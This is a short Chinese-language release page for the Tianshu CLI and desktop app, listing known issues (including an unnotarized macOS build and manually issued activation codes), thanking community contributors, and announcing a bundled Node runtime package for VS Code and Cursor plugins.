已知问题(如实标注)

  • 桌面端未公证(无 APPLE_SIGNING_IDENTITY):macOS 安装后如提示「已损坏」,执行 xattr -cr /Applications/Tianshu.app
  • 国内自助支付渠道尚未配置:激活码请用管理台手工发放

致谢

本期 7/9 提交来自社区:@yq04#40 #41 #42 #43 #45,均附根因分析与 RED→GREEN 测试基线)、@HarriethWiKk#5 微滚动意图保留;#38 Provider onboarding 统一栈已随 v3.3.0 收录)。感谢每一位贡献者。

runtime-v3.4.0

Choose a tag to compare

@huiliyi37 huiliyi37 released this 17 Aug 03:21

天枢 CLI v3.4.0 自带 Node 运行时包(VS Code / Cursor 插件自举用,darwin-arm64)